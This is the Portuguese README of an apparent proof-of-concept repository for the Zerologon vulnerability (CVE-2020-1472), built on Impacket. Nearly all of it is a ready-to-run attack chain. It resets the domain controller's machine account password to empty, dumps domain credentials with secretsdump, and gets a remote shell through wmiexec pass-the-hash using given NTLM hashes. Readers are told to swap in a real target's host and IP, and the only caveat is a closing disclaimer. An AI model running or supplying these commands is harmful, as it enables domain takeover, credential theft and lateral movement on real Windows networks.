
Uma prova de conceito prática para CVE-2020-1472 (Zerologon) usando a biblioteca Impacket para explorar a vulnerabilidade Netlogon e realizar acesso não autorizado ao controlador de domínio.
Este repositório contém uma implementação atualizada (2024) do exploit Zerologon combinado com ferramentas Impacket para explorar CVE-2020-1472 (Zerologon). Este exploit tem como alvo ambientes Windows Server para manipular senhas de contas de máquina e realizar movimentação lateral.
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 e 192.168.40.145 pelo nome do host e endereço IP reais do alvo.Use esta ferramenta com responsabilidade. O uso não autorizado desta ferramenta para explorar sistemas sem permissão explícita é ilegal e antiético. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.